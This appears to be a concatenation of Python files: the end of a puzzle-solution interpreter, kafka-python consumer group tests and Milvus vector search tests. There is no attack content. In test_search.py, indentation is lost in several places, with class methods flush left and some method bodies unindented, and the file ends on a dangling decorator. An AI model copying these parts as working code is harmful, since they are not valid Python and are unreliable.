            registers[parts[1]] *= operand(parts[2])
        elif op == 'mod':
            registers[parts[1]] = registers[parts[1]] % operand(parts[2])
        elif op == 'rcv':
            if registers[parts[1]] != 0:
                return last_sound
        elif op == 'jgz':
            if operand(parts[1]) > 0:
                pc += operand(parts[2])
                continue
        pc += 1
    return last_sound
# Script entry: read the puzzle input (one instruction per line) from
# 'input.in' next to this script and print the answers for both parts.
with open('input.in') as f:
    instructions = f.read().splitlines()
print(first(instructions))
print(solve_second(instructions))
|
test_consumer_group.py | import collections
import logging
import threading
import time
import pytest
import six
from kafka import SimpleClient
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.structs import TopicPartition
from test.conftest import version
from test.testutil import random_string
def get_connect_str(kafka_broker):
    """Return the bootstrap-servers string for a fixture broker on localhost."""
    return 'localhost:{0}'.format(kafka_broker.port)
@pytest.fixture
def simple_client(kafka_broker):
    """SimpleClient connected to the fixture broker."""
    return SimpleClient(get_connect_str(kafka_broker))
@pytest.fixture
def topic(simple_client):
    """Create a randomly named topic on the broker and return its name."""
    topic = random_string(5)
    simple_client.ensure_topic_exists(topic)
    return topic
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, version):
    """Smoke test: a KafkaConsumer with no subscription still connects.

    NOTE(review): `topic(simple_client(kafka_broker))` calls pytest
    fixtures as plain functions, which modern pytest forbids -- confirm
    against the pytest version this project pins. The `version` parameter
    also shadows the imported `version()` helper used in the decorator.
    """
    # 0.8.2 brokers need a topic to function well
    if version >= (0, 8, 2) and version < (0, 9):
        topic(simple_client(kafka_broker))
    consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
    consumer.poll(500)
    # poll() should have established at least one broker connection
    assert len(consumer._client._conns) > 0
    node_id = list(consumer._client._conns.keys())[0]
    assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
@pytest.mark.skipif(version() < (0, 9), reason='Unsupported Kafka Version')
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_group(kafka_broker, topic):
    """End-to-end group rebalance test.

    Starts four consumers in one group, waits (up to 35s) until all share
    a single generation with no coordinator rejoining, then checks the
    per-consumer assignments are non-empty, pairwise disjoint, and
    together cover every partition of the topic.
    """
    num_partitions = 4
    connect_str = get_connect_str(kafka_broker)
    consumers = {}
    stop = {}
    threads = {}
    # BUG FIX: messages is indexed twice (consumer -> partition), so the inner
    # level must itself be a defaultdict(list); the original flat
    # defaultdict(list) made messages[i][tp] a list index and raised TypeError.
    messages = collections.defaultdict(lambda: collections.defaultdict(list))
    group_id = 'test-group-' + random_string(6)

    def consumer_thread(i):
        assert i not in consumers
        assert i not in stop
        stop[i] = threading.Event()
        consumers[i] = KafkaConsumer(topic,
                                     bootstrap_servers=connect_str,
                                     group_id=group_id,
                                     heartbeat_interval_ms=500)
        while not stop[i].is_set():
            # BUG FIX: poll() returns {TopicPartition: [records]}; unpacking
            # (tp, records) requires iteritems(), not itervalues().
            for tp, records in six.iteritems(consumers[i].poll(100)):
                messages[i][tp].extend(records)
        consumers[i].close()
        del consumers[i]
        del stop[i]

    num_consumers = 4
    for i in range(num_consumers):
        t = threading.Thread(target=consumer_thread, args=(i,))
        t.start()
        threads[i] = t

    try:
        timeout = time.time() + 35
        while True:
            for c in range(num_consumers):
                # Verify all consumers have been created
                if c not in consumers:
                    break
                # Verify all consumers have an assignment
                elif not consumers[c].assignment():
                    break
            # If all consumers exist and have an assignment
            else:
                # Verify all consumers are in the same generation
                # then log state and break while loop
                generations = set([consumer._coordinator.generation
                                   for consumer in list(consumers.values())])
                # New generation assignment is not complete until
                # coordinator.rejoining = False
                rejoining = any([consumer._coordinator.rejoining
                                 for consumer in list(consumers.values())])
                if not rejoining and len(generations) == 1:
                    for c, consumer in list(consumers.items()):
                        logging.info("[%s] %s %s: %s", c,
                                     consumer._coordinator.generation,
                                     consumer._coordinator.member_id,
                                     consumer.assignment())
                    break
            assert time.time() < timeout, "timeout waiting for assignments"

        group_assignment = set()
        for c in range(num_consumers):
            assert len(consumers[c].assignment()) != 0
            assert set.isdisjoint(consumers[c].assignment(), group_assignment)
            group_assignment.update(consumers[c].assignment())
        assert group_assignment == set([
            TopicPartition(topic, partition)
            for partition in range(num_partitions)])
    finally:
        for c in range(num_consumers):
            stop[c].set()
            threads[c].join()
@pytest.mark.skipif(not version(), reason="No KAFKA_VERSION set")
def test_paused(kafka_broker, topic):
    """pause()/resume() on a manually assigned partition is reflected in paused()."""
    consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
    topics = [TopicPartition(topic, 1)]
    consumer.assign(topics)
    assert set(topics) == consumer.assignment()
    assert set() == consumer.paused()
    consumer.pause(topics[0])
    assert set([topics[0]]) == consumer.paused()
    consumer.resume(topics[0])
    assert set() == consumer.paused()
    # unsubscribing clears the assignment and therefore the paused set too
    consumer.unsubscribe()
    assert set() == consumer.paused()
|
test_search.py | import time
import pdb
import copy
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from pymilvus import DataType
from utils import *
from constants import *
# Module-wide fixtures for the search suite; the entity sets are generated
# once at import time and shared across tests.
uid = "test_search"  # prefix for generated unique collection names
nq = 1  # default number of query vectors per search
epsilon = 0.001  # distance tolerance used for "found the query vector itself"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)  # single-row sample entity
entities = gen_entities(default_nb, is_normal=True)  # default float-vector data set
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, default_top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, default_top_k,
                                                                    nq)
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
    '''
    Insert test entities into `collection` and flush.

    Reuses the module-level `entities` set when nb == 3000, otherwise
    generates a fresh set. With auto_id=False, explicit ids 0..nb-1 are
    assigned; partition_names (a single partition name) scopes the insert.
    Returns (inserted_entities, ids).
    '''
    global entities
    insert_entities = entities if nb == 3000 else gen_entities(nb, is_normal=True)
    # Build the optional insert arguments instead of branching four ways.
    extra = {}
    if not auto_id:
        extra['ids'] = [i for i in range(nb)]
    if partition_names is not None:
        extra['partition_name'] = partition_names
    ids = connect.insert(collection, insert_entities, **extra)
    connect.flush([collection])
    return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
    '''
    Generate binary entities and optionally insert them into `collection`.

    Reuses the module-level binary fixtures when nb == 3000. When insert is
    True the entities are inserted (optionally into partition_names) and the
    collection is flushed. Returns (raw_vectors, entities, ids) with ids
    empty when nothing was inserted.
    '''
    ids = []
    global binary_entities
    global raw_vectors
    if nb == 3000:
        insert_raw_vectors, insert_entities = raw_vectors, binary_entities
    else:
        insert_raw_vectors, insert_entities = gen_binary_entities(nb)
    if insert is True:
        if partition_names is None:
            ids = connect.insert(collection, insert_entities)
        else:
            ids = connect.insert(collection, insert_entities, partition_name=partition_names)
        connect.flush([collection])
    return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
    scope="function",
    params=gen_index()
)
def get_index(self, request, connect):
    """Parametrize over every index configuration produced by gen_index()."""
    # if str(connect._cmd("mode")) == "CPU":
    #     if request.param["index_type"] in index_cpu_not_support():
    #         pytest.skip("sq8h not support in CPU mode")
    return request.param
@pytest.fixture(
    scope="function",
    params=gen_simple_index()
)
def get_simple_index(self, request, connect):
    """Parametrize over gen_simple_index(); returns a deep copy because
    several tests mutate the dict (e.g. overwrite 'metric_type') in place."""
    # if str(connect._cmd("mode")) == "CPU":
    #     if request.param["index_type"] in index_cpu_not_support():
    #         pytest.skip("sq8h not support in CPU mode")
    return copy.deepcopy(request.param)
@pytest.fixture(
    scope="function",
    params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
    """Binary index params filtered to binary_support(); note that
    unsupported index types fall through and yield None instead of skipping."""
    logging.getLogger().info(request.param)
    if request.param["index_type"] in binary_support():
        return request.param
    # else:
    #     pytest.skip("Skip index Temporary")
@pytest.fixture(
    scope="function",
    params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
    """Same filtering as get_jaccard_index: binary index params restricted
    to binary_support(); unsupported types yield None instead of skipping."""
    logging.getLogger().info(request.param)
    if request.param["index_type"] in binary_support():
        return request.param
    # else:
    #     pytest.skip("Skip index Temporary")
@pytest.fixture(
    scope="function",
    params=gen_binary_index()
)
def get_structure_index(self, request, connect):
    """Restrict the binary-index params to FLAT only; every other index
    type falls through and yields None instead of skipping."""
    logging.getLogger().info(request.param)
    if request.param["index_type"] == "FLAT":
        return request.param
    # else:
    #     pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
    scope="function",
    params=[1, 10]
)
def get_top_k(self, request):
    """Top-k values exercised by the suite."""
    yield request.param
@pytest.fixture(
    scope="function",
    params=[1, 10, 1100]
)
def get_nq(self, request):
    """Query-vector counts exercised by the suite (includes a large 1100 case)."""
    yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_flat(self, connect, collection, get_top_k, get_nq):
    '''
    target: basic search on an unindexed (FLAT) collection across top-k values
    method: insert default entities, search with vectors generated from them
    expected: top_k hits per query when top_k is legal, otherwise an exception
    '''
    top_k = get_top_k
    nq = get_nq
    entities, ids = init_data(connect, collection)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
    if top_k <= max_top_k:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res[0]) == top_k
        # best hit is the query vector itself -> (near-)zero distance
        assert res[0]._distances[0] <= epsilon
        assert check_id_result(res[0], ids[0])
    else:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
def test_search_flat_top_k(self, connect, collection, get_nq):
    '''
    target: search with top_k above the supported maximum
    method: search with a fixed top_k of 16385; when max_top_k is smaller
            the else branch applies (the success branch is kept for parity
            with test_search_flat in case max_top_k ever changes)
    expected: exception raised
    '''
    top_k = 16385
    nq = get_nq
    entities, ids = init_data(connect, collection)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
    if top_k <= max_top_k:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res[0]) == top_k
        assert res[0]._distances[0] <= epsilon
        assert check_id_result(res[0], ids[0])
    else:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
    '''
    target: search restricted to specific output fields
    method: search with fields=["float_vector"], then fields=["float"],
            and verify the scalar field values come back with the hits
    expected: top_k hits; requested scalar values match the inserted data
    '''
    # NOTE(review): the leading underscore already keeps pytest from
    # collecting this, independent of the skip mark.
    top_k = get_top_k
    nq = get_nq
    entities, ids = init_data(connect, collection)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
    if top_k <= max_top_k:
        connect.load_collection(collection)
        res = connect.search(collection, query, fields=["float_vector"])
        assert len(res[0]) == top_k
        assert res[0]._distances[0] <= epsilon
        assert check_id_result(res[0], ids[0])
        res = connect.search(collection, query, fields=["float"])
        for i in range(nq):
            assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
    else:
        with pytest.raises(Exception):
            connect.search(collection, query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
    '''
    target: deleted entities must not appear in later search results
            (milvus issue #4200, github.com/milvus-io/milvus/issues/4200)
    method: search for the first inserted vector, delete that entity,
            flush, search again
    expected: the deleted id disappears and the former second hit becomes
              the first
    '''
    top_k = get_top_k
    nq = get_nq
    entities, ids = init_data(connect, collection, nb=10000)
    first_int64_value = entities[0]["values"][0]
    first_vector = entities[2]["values"][0]
    search_param = get_search_param("FLAT")
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
    # replace the generated query vectors with exactly the first inserted one
    vecs[:] = []
    vecs.append(first_vector)
    res = None
    if top_k > max_top_k:
        with pytest.raises(Exception):
            connect.search(collection, query, fields=['int64'])
        # pytest.skip("top_k value is larger than max_topp_k")
        pass
    else:
        res = connect.search(collection, query, fields=['int64'])
        assert len(res) == 1
        assert len(res[0]) >= top_k
        # best hit is the first entity itself
        assert res[0][0].id == ids[0]
        assert res[0][0].entity.get("int64") == first_int64_value
        assert res[0]._distances[0] < epsilon
        assert check_id_result(res[0], ids[0])
        connect.delete_entity_by_id(collection, ids[:1])
        connect.flush([collection])
        res2 = connect.search(collection, query, fields=['int64'])
        assert len(res2) == 1
        assert len(res2[0]) >= top_k
        assert res2[0][0].id != ids[0]
        if top_k > 1:
            # the previous runner-up moves into first place
            assert res2[0][0].id == res[0][1].id
            assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: search after building each supported index type
    method: insert, create index, search with index-appropriate params
    expected: at least top_k hits with a (near-)zero-distance best match
    '''
    top_k = get_top_k
    nq = get_nq
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    entities, ids = init_data(connect, collection)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    else:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) >= top_k
        assert res[0]._distances[0] < epsilon
        assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
    '''
    target: search with a metric_type different from the index's
    method: build the index (default metric), then search with metric_type="IP"
    expected: FLAT tolerates the mismatch (IP ordering: best/largest
              distance first); any other index type raises
    '''
    search_metric_type = "IP"
    index_type = get_simple_index["index_type"]
    entities, ids = init_data(connect, collection)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, metric_type=search_metric_type,
                                    search_params=search_param)
    connect.load_collection(collection)
    if index_type == "FLAT":
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) == default_top_k
        # IP similarity: the first hit's score exceeds the last's
        assert res[0]._distances[0] > res[0]._distances[default_top_k - 1]
    else:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: search an indexed collection that also has an empty partition
    method: create a partition, insert into the default partition only,
            build index, search the whole collection and then only the
            (empty) partition
    expected: collection-wide search returns top_k hits; the empty
              partition returns none
    '''
    top_k = get_top_k
    nq = get_nq
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, default_tag)
    entities, ids = init_data(connect, collection)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    else:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) >= top_k
        assert res[0]._distances[0] < epsilon
        assert check_id_result(res[0], ids[0])
        # switch to loading only the empty partition before the scoped search
        connect.release_collection(collection)
        connect.load_partitions(collection, [default_tag])
        res = connect.search(collection, query, partition_names=[default_tag])
        assert len(res[0]) == 0
@pytest.mark.level(2)
@pytest.mark.timeout(600)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: search scoped to the partition that actually holds the data
    method: insert into a named partition, build index, load and search
            that partition only
    expected: exactly top_k hits with a near-zero best distance
    '''
    top_k = get_top_k
    nq = get_nq
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, default_tag)
    entities, ids = init_data(connect, collection, partition_names=default_tag)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query, partition_names=[default_tag])
    else:
        connect.load_partitions(collection, [default_tag])
        res = connect.search(collection, query, partition_names=[default_tag])
        assert len(res) == nq
        assert len(res[0]) == top_k
        assert res[0]._distances[0] < epsilon
        assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_not_existed(self, connect, collection, get_top_k, get_nq, get_simple_index):
    '''
    target: search a partition name that was never created
    method: insert, build index, search with partition_names=["new_tag"]
    expected: exception raised on both paths (illegal top_k or missing
              partition)
    '''
    top_k = get_top_k
    nq = get_nq
    entities, ids = init_data(connect, collection)
    connect.create_index(collection, field_name, get_simple_index)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query, partition_names=["new_tag"])
    else:
        connect.load_collection(collection)
        with pytest.raises(Exception) as e:
            connect.search(collection, query, partition_names=["new_tag"])
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
    '''
    target: search across two populated partitions
    method: insert different data into two partitions, build index, search
            the whole collection and then only the second partition using
            vectors taken from the first
    expected: collection-wide search finds the first partition's ids at
              near-zero distance; the other-partition search does not
    '''
    top_k = get_top_k
    nq = 2
    new_tag = "new_tag"
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, default_tag)
    connect.create_partition(collection, new_tag)
    entities, ids = init_data(connect, collection, partition_names=default_tag)
    new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    # queries are built from the default_tag entities only
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    else:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert check_id_result(res[0], ids[0])
        assert not check_id_result(res[1], new_ids[0])
        assert res[0]._distances[0] < epsilon
        assert res[1]._distances[0] < epsilon
        res = connect.search(collection, query, partition_names=[new_tag])
        # the queried vectors do not live in new_tag -> no near-zero hit
        assert res[0]._distances[0] > epsilon
        assert res[1]._distances[0] > epsilon
    connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
    '''
    target: search partitions selected by regex-style name patterns
    method: two partitions "tag"/"new_tag"; query with vectors from the
            second while searching partition_names=["(.*)tag"] (matches
            both) and ["new(.*)"] (matches the second only)
    expected: both pattern-scoped searches find the queried vectors at
              near-zero distance
    '''
    top_k = get_top_k
    nq = 2
    tag = "tag"
    new_tag = "new_tag"
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, tag)
    connect.create_partition(collection, new_tag)
    entities, ids = init_data(connect, collection, partition_names=tag)
    new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    # queries come from the new_tag data set
    query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    else:
        connect.load_collection(collection)
        res = connect.search(collection, query, partition_names=["(.*)tag"])
        assert not check_id_result(res[0], ids[0])
        assert res[0]._distances[0] < epsilon
        assert res[1]._distances[0] < epsilon
        res = connect.search(collection, query, partition_names=["new(.*)"])
        assert res[0]._distances[0] < epsilon
        assert res[1]._distances[0] < epsilon
    connect.release_collection(collection)
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: basic inner-product search without an index
    method: insert, search with metric_type="IP"
    expected: top_k hits; the query vector matching itself scores ~1
    '''
    top_k = get_top_k
    nq = get_nq
    entities, ids = init_data(connect, collection)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
    connect.load_collection(collection)
    res = connect.search(collection, query)
    assert len(res[0]) == top_k
    # self-match similarity should be ~1 within the generator's inaccuracy
    assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
    assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: inner-product search after building each supported index
    method: force metric_type="IP" on the index params, build, search with
            IP query params
    expected: at least top_k hits; the self-match scores ~1
    '''
    top_k = get_top_k
    nq = get_nq
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    entities, ids = init_data(connect, collection)
    # mutate the (deep-copied) fixture dict to build an IP index
    get_simple_index["metric_type"] = "IP"
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
    connect.load_collection(collection)
    res = connect.search(collection, query)
    assert len(res) == nq
    assert len(res[0]) >= top_k
    assert check_id_result(res[0], ids[0])
    assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
    '''
    target: IP search on an indexed collection with an extra empty partition
    method: create partition, insert into the default partition, build an
            IP index, search collection-wide and then only the empty
            partition
    expected: collection-wide search returns top_k hits; the empty
              partition returns none
    '''
    top_k = get_top_k
    nq = get_nq
    metric_type = "IP"
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, default_tag)
    entities, ids = init_data(connect, collection)
    get_simple_index["metric_type"] = metric_type
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
                                    search_params=search_param)
    if top_k > max_top_k:
        with pytest.raises(Exception) as e:
            res = connect.search(collection, query)
    else:
        connect.load_collection(collection)
        res = connect.search(collection, query)
        assert len(res) == nq
        assert len(res[0]) >= top_k
        assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
        assert check_id_result(res[0], ids[0])
        res = connect.search(collection, query, partition_names=[default_tag])
        assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
    '''
    target: IP search across two populated partitions
    method: insert into default_tag and new_tag partitions, build an IP
            index, search collection-wide, then only new_tag using vectors
            from default_tag
    expected: collection-wide search matches the first partition's ids
              with similarity ~1; the new_tag-only search scores lower
    '''
    top_k = get_top_k
    nq = 2
    metric_type = "IP"
    new_tag = "new_tag"
    index_type = get_simple_index["index_type"]
    if index_type in skip_pq():
        pytest.skip("Skip PQ")
    connect.create_partition(collection, default_tag)
    connect.create_partition(collection, new_tag)
    entities, ids = init_data(connect, collection, partition_names=default_tag)
    new_entities, new_ids = init_data(connect, collection, nb=6001, partition_names=new_tag)
    get_simple_index["metric_type"] = metric_type
    connect.create_index(collection, field_name, get_simple_index)
    search_param = get_search_param(index_type)
    # queries come from the default_tag data set
    query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
    connect.load_collection(collection)
    res = connect.search(collection, query)
    assert check_id_result(res[0], ids[0])
    assert not check_id_result(res[1], new_ids[0])
    assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
    assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
    res = connect.search(collection, query, partition_names=["new_tag"])
    # queried vectors are not in new_tag, so the self-match similarity is absent
    assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
    # TODO:
    # assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
    '''
    target: search through a disconnected client
    method: call search() on the dis_connect fixture
    expected: exception raised
    '''
    with pytest.raises(Exception) as e:
        res = dis_connect.search(collection, default_query)
def test_search_collection_not_existed(self, connect):
    '''
    target: search a collection that does not exist
    method: search using a freshly generated (never created) collection name
    expected: exception raised
    '''
    collection_name = gen_unique_str(uid)
    with pytest.raises(Exception) as e:
        res = connect.search(collection_name, default_query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_distance_l2(self, connect, collection):
    '''
    target: verify the reported L2 distance against a local computation
    method: insert two entities, search with a random vector, compare the
            best reported distance with min(l2 to each inserted vector)
    expected: values agree within the generator's inaccuracy tolerance
    '''
    nq = 2
    search_param = {"nprobe": 1}
    entities, ids = init_data(connect, collection, nb=nq)
    query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
                                    search_params=search_param)
    inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
                                                  search_params=search_param)
    distance_0 = l2(vecs[0], inside_vecs[0])
    distance_1 = l2(vecs[0], inside_vecs[1])
    connect.load_collection(collection)
    res = connect.search(collection, query)
    # sqrt before comparing: the reported distance is apparently squared L2
    assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
    def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
        '''
        target: search collection after building an index, and check the result
        method: brute-force the nearest L2 neighbour over the inserted vectors and
                check the search returns the same id
        expected: the returned top-1 id matches the computed nearest neighbour
        '''
        index_type = get_simple_index["index_type"]
        nq = 2
        entities, ids = init_data(connect, id_collection, auto_id=False)
        connect.create_index(id_collection, field_name, get_simple_index)
        search_param = get_search_param(index_type)
        query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
                                        search_params=search_param)
        inside_vecs = entities[-1]["values"]
        # NOTE(review): assumes all L2 distances to the query are < 1.0, otherwise
        # min_id stays None — confirm against the vector generator's value range
        min_distance = 1.0
        min_id = None
        for i in range(default_nb):
            tmp_dis = l2(vecs[0], inside_vecs[i])
            if min_distance > tmp_dis:
                min_distance = tmp_dis
                min_id = ids[i]
        connect.load_collection(id_collection)
        res = connect.search(id_collection, query)
        tmp_epsilon = epsilon
        check_id_result(res[0], min_id)
        # if index_type in ["ANNOY", "IVF_PQ"]:
        #     tmp_epsilon = 0.1
        # TODO:
        # assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, default_top_k, nq,
search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
connect.load_collection(collection)
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq, rand_vector=True,
metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(default_nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
connect.load_collection(id_collection)
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
        '''
        target: search binary_collection, and check the result: distance
        method: compare the returned distance with the value computed with the Jaccard metric
        expected: the return distance equals to the computed value
        '''
        nq = 1
        int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
        # query entities are generated but NOT inserted (insert=False)
        query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
        distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
        distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
        query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_binary_flat_with_L2(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
connect.search(binary_collection, query)
    @pytest.mark.level(2)
